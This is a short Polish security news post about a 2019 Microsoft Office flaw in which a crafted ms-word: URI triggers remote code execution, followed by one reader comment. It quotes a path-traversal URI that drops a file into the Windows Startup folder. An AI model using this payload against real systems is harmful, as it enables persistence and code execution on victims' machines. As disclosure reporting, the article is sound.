Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Zdalne wykonanie kodu przez otwarcie dokumentu Microsoft Office

27 września 2019, 18:55 | W biegu | 1 komentarz

We wszystkich wersjach pakietu biurowego Microsoft od wersji 2010 istniała możliwość wykonania dowolnego kodu poprzez odpowiednie hiperłącze. Odkrywcą podatności jest Simon Zuckerbraun (@hexkitchen) z Trend Micro. Jak na wiele luk, tak i na tę składa się wiele czynników.

Przede wszystkim Office implementuje URI (Uniform Resource Identifier), o którym pisaliśmy szeroko tutaj, zaczynający się od ms-word, ms-excel, ms-powerpoint itd. Dla przykładu, poniższym URI można rozpocząć pobieranie i automatyczne otwarcie dokumentu Worda:

ms-word:ofe|u|http://example.com/SomePath/SomeDoc.docx

Przeglądarka wyświetli w takim przypadku ostrzeżenie, ale nie wszystkie komunikaty jednoznacznie określają zagrożenie. Internet Explorer (na który kilka dni temu był aktywny exploit 0-day), wyświetla następującą treść:

Użytkownik nietechniczny może mieć trudności ze zrozumieniem ostrzeżenia.

Atak zadziała na wszystkich systemach Windows z przestarzałym Office (aktualizacja pojawiła się w kwietniu, ale z “przyczyn licencyjnych” nie wszyscy regularnie aktualizują ten pakiet). Po drugie wciąż mało osób korzysta z kont o ograniczonych uprawnieniach oraz autostart nie jest przypisany do konkretnego użytkownika. Poniższe URI wykorzystuje opisane czynniki dodając plik w00t.url do autostartu:

ms-word:ofe|u|http://example.com/SomePath/SomeDoc.docx?\..\..\..\Windows\Start Menu\Programs\Startup\w00t

Jakie jest realne ryzyko wykorzystania tego błędu? Microsoft pisze aż o Remote Code Execution – sami badacze są nieco bardziej ostrożni i piszą – to zależy.

–mg

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. szymon

    z “przyczyn licencyjnych” to dobre określenie :)

    Odpowiedz

Odpowiedz